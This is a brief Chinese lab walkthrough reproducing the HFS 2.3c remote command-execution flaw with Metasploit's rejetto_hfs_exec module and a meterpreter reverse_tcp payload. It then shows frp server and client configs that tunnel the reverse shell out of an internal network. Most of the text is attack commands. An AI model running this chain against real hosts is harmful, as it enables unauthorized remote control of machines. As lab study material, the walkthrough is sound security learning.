環境搭建
hfs在比較早的版本存在命令執行漏洞,2.3c及以前的2.3x版本
下載鏈接
http://d3.meisq.net:806/1206/hfshttp.zip
打開之後設置默認運行
這裏 kali
ip192.168.164.129
HFS
ip192.168.164.128
漏洞復現
同一網絡環境
kali配置
msfconsole
search hfs
use exploit/windows/http/rejetto_hfs_exec
show options
set rhosts 192.168.164.128
set rport 949
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.164.129
show options
其他配置不用修改,可以根據環境和實際情況進行修改
run
內網msf
首先把hfs
橋接到局域網,之後kali
在內網,
hfs
ip192.168.1.120
kali
ip192.168.164.129
vps
ip192.168.1.110
’
這裏在局域網模擬公網環境
msfconsole
use exploit/windows/http/rejetto_hfs_exec
show options
set rhosts 192.168.1.120
set rport 949
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.1.110
show options
在192.168.164.110
啓動frps
frps -c frps.ini
frps.ini
配置
[common]
bind_port = 7000
token = 12345678
在kali
啓動frpc
/root/frp30/frpc -c /root/frp30/frpc.ini
frpc.ini
配置
[common]
server_addr = 192.168.1.110
server_port = 7000
token = 12345678
[msf]
type = tcp
local_ip = 127.0.0.1
local_port = 4444
remote_port = 4444
[http]
type = tcp
local_ip = 127.0.0.1
local_port = 8080
remote_port = 8080
msf啓動
run
小結
這是實際遇到的環境,當時遇到了好多問題,所以總結一下。